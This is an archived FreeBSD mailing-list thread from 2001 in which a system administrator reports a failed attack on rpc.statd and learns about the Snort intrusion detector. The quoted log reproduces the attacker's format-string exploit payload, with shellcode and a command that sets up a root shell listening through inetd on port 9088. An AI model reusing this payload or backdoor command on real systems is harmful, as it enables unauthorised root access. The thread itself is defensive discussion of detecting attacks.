Date: Thu, 4 Jan 2001 10:16:31 -0600 From: Eric_Stanfield@kenokozie.com To: Guy Helmer <ghelmer@palisadesys.com> Cc: freebsd-questions@FreeBSD.ORG Subject: Re: hack attempt (again) - help Message-ID: <OFBA7E069E.3E8C41C0-ON862569CA.00595399@kka.com>
next in thread | raw e-mail | index | archive | help
Snort compiled, configured and running in less than 10 minutes. The
ruleset looks very good for my purposes. Thanks for the tip, this is a=
good find.
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-
Eric Stanfield, K2Access
Keno Kozie and Associates
222 N LaSalle #1500
Chicago, IL 60606
(312) 332-3000
=
=20
Guy Helmer =
=20
<ghelmer@palisa To: Eric_Stanfield@kenok=
ozie.com =20
desys.com> cc: freebsd-questions@Fr=
eeBSD.ORG =20
Subject: Re: hack attemp=
t (again) - help =20
01/04/01 09:26 =
=20
AM =
=20
=
=20
=
=20
On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote:
> Alright this jerkoff has once again attempted to hack one of my freeb=
sd
> machines by trying what I assume is a buffer overflow to rpc:
>
> Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
> ^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7=
=FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x
%08x
> %08x %08x %08x %08x %08x %08x %08x
>
%0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM=
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P=
M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^=
PM-^PM-^PM-^PM-^P=EBK^M-
>
> v=ACM-^C=EE M-^M^(M-^C=C6 M- ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C=
=EB#M- ^=B41=C0M-^C=EE
> M-^HF'M-^HF*M-^C=C6 M-^HF=ABM- F=B8=B0+, M- =F3M-^MN=ACM-^MV=B8=CD=
M-^@1=DBM-
> =D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait roo=
t /bin/sh -i" >>
> /tmp/m; /usr/sbin/inetd /tmp/m;
>
> The interesting bit is what he (she?) is attempting to sneak in at th=
e
end
> of the garbage sent to the port.
>
> I've given the system a thorough check and this seems to have been a
second
> failed attempt. I'm now annoyed, however, and would like to be able =
to
at
> least log what address this stuff is originating from. Can anyone
suggest
> something from the ports that would do the trick? I've disabled nfs/=
rpc
> but I'm sure the hacker will come knocking again.
snort with a current copy of the rule set from
http://www.whitehats.com/ids/index.html ought to detect this (and lots =
of
other script kiddie attempts).
Guy
--
Guy Helmer, Ph.D.
Sr. Software Engineer, Palisade Systems ---
ghelmer@palisadesys.com
http://www.palisadesys.com/~ghelmer
=
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?OFBA7E069E.3E8C41C0-ON862569CA.00595399>